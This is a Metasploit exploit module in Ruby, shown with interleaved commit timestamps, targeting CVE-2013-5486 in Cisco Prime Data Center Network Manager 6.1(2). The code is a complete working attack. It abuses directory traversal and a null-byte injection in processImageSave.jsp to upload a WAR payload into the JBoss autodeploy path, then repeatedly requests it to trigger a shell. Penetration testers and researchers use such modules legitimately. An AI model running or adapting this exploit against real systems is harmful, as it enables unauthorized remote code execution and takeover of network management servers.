2013-11-30 05:11:44 +00:00
##
2014-10-17 16:47:33 +00:00
# This module requires Metasploit: http://metasploit.com/download
2013-11-30 05:11:44 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf :: Exploit :: Remote
Rank = ExcellentRanking
include Msf :: Exploit :: Remote :: HttpClient
include Msf :: Exploit :: FileDropper
def initialize ( info = { } )
super ( update_info ( info ,
'Name' = > 'Cisco Prime Data Center Network Manager Arbitrary File Upload' ,
'Description' = > %q{
This module exploits a code execution flaw in Cisco Data Center Network Manager . The
2013-12-02 22:19:05 +00:00
vulnerability exists in processImageSave . jsp , which can be abused through a directory
2013-11-30 05:11:44 +00:00
traversal and a null byte injection to upload arbitrary files . The autodeploy JBoss
application server feature is used to achieve remote code execution . This module has been
tested successfully on Cisco Prime Data Center Network Manager 6 . 1 ( 2 ) on Windows 2008 R2
( 64 bits ) .
} ,
'Author' = >
[
'rgod <rgod[at]autistici.org>' , # Vulnerability discovery
'juan vazquez' # Metasploit module
] ,
'License' = > MSF_LICENSE ,
'References' = >
[
[ 'CVE' , '2013-5486' ] ,
2013-11-30 05:13:07 +00:00
[ 'OSVDB' , '97426' ] ,
[ 'ZDI' , '13-254' ] ,
2013-11-30 05:11:44 +00:00
[ 'URL' , 'http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20130918-dcnm' ]
] ,
'Privileged' = > true ,
'Platform' = > 'java' ,
'Arch' = > ARCH_JAVA ,
'Targets' = >
[
[ 'Cisco DCNM 6.1(2) / Java Universal' ,
{
'AutoDeployPath' = > " ../../../../../deploy " ,
'CleanupPath' = > " ../../jboss-4.2.2.GA/server/fm/deploy "
}
]
] ,
'DefaultTarget' = > 0 ,
'DisclosureDate' = > 'Sep 18 2013' ) )
register_options (
[
2013-12-02 14:42:25 +00:00
OptString . new ( 'TARGETURI' , [ true , 'Path to Cisco DCNM' , '/' ] ) ,
OptInt . new ( 'ATTEMPTS' , [ true , 'The number of attempts to execute the payload (auto deployed by JBoss)' , 10 ] )
2013-11-30 05:11:44 +00:00
] , self . class )
end
def upload_file ( location , filename , contents )
res = send_request_cgi (
{
'uri' = > normalize_uri ( target_uri . path , " cues_utility " , " charts " , " processImageSave.jsp " ) ,
'method' = > 'POST' ,
'encode_params' = > false ,
'vars_post' = >
{
" mode " = > " save " ,
" savefile " = > " true " ,
" chartid " = > " #{ location } / #{ filename } %00 " ,
" data " = > Rex :: Text . uri_encode ( Rex :: Text . encode_base64 ( contents ) )
}
} )
if res and res . code == 200 and res . body . to_s =~ / success /
return true
else
return false
end
end
def check
version = " "
res = send_request_cgi ( {
'url' = > target_uri . to_s ,
'method' = > 'GET'
} )
2013-11-30 15:46:22 +00:00
unless res
2014-01-21 23:14:55 +00:00
vprint_error ( " Connection timed out " )
2013-11-30 15:46:22 +00:00
return Exploit :: CheckCode :: Unknown
end
if res . code == 200 and
2013-11-30 05:11:44 +00:00
res . body . to_s =~ / Data Center Network Manager / and
res . body . to_s =~ / <div class="productVersion">Version: (.*)< \/ div> /
version = $1
2014-01-21 23:14:55 +00:00
vprint_status ( " Cisco Primer Data Center Network Manager version #{ version } found " )
if version =~ / 6 \ .1 /
return Exploit :: CheckCode :: Appears
else
return Exploit :: CheckCode :: Detected
end
elsif res . code == 200 and res . body . to_s =~ / Data Center Network Manager /
2013-11-30 15:46:22 +00:00
return Exploit :: CheckCode :: Detected
2013-11-30 05:11:44 +00:00
end
2014-01-21 23:14:55 +00:00
Exploit :: CheckCode :: Safe
2013-11-30 05:11:44 +00:00
end
def exploit
2013-12-02 14:42:25 +00:00
attempts = datastore [ 'ATTEMPTS' ]
fail_with ( Failure :: BadConfig , " #{ peer } - Configure 1 or more ATTEMPTS " ) unless attempts > 0
2013-11-30 05:11:44 +00:00
app_base = rand_text_alphanumeric ( 4 + rand ( 32 - 4 ) )
# By default uploads land here: C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\tmp\deploy\tmp3409372432509144123dcm-exp.war\cues_utility\charts
# Auto deploy dir is here C:\Program Files\Cisco Systems\dcm\jboss-4.2.2.GA\server\fm\deploy
# Sessions pwd is here C:\Program Files\Cisco Systems\dcm\fm\bin
war = payload . encoded_war ( { :app_name = > app_base } ) . to_s
war_filename = " #{ app_base } .war "
war_location = target [ 'AutoDeployPath' ]
print_status ( " #{ peer } - Uploading WAR file #{ war_filename } ... " )
res = upload_file ( war_location , war_filename , war )
if res
register_files_for_cleanup ( " #{ target [ 'CleanupPath' ] } / #{ war_filename } " )
else
fail_with ( Failure :: Unknown , " #{ peer } - Failed to upload the WAR payload " )
end
2013-12-02 14:42:25 +00:00
2013-12-02 14:43:22 +00:00
attempts . times do
2013-11-30 05:11:44 +00:00
select ( nil , nil , nil , 2 )
# Now make a request to trigger the newly deployed war
print_status ( " #{ peer } - Attempting to launch payload in deployed WAR... " )
res = send_request_cgi (
{
'uri' = > normalize_uri ( target_uri . path , app_base , Rex :: Text . rand_text_alpha ( rand ( 8 ) + 8 ) ) ,
'method' = > 'GET'
} )
# Failure. The request timed out or the server went away.
2013-12-02 01:55:53 +00:00
fail_with ( Failure :: TimeoutExpired , " #{ peer } - The request timed out or the server went away. " ) if res . nil?
2013-11-30 05:11:44 +00:00
# Success! Triggered the payload, should have a shell incoming
break if res . code == 200
end
end
end